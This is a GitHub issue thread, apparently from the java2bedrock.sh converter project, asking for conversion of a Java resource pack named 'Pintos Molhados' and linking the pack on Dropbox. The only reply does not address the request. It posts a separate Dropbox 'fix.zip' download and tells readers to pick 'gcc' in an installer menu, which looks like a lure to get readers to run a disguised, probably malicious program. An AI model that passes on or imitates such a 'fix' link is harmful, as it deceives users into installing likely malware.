### ISSUE TITLE
[Pack]: Pintos Molhados

### ISSUE THREAD

**Issue by LipeTato** [Kas-tle/java2bedrock.sh#33290]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/5i8ci0yg5z7owghpfoqkh/generated.zip?rlkey=nq8thr47zn6yl749h4ssekyav&st=1fcsxx7r&dl=0

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
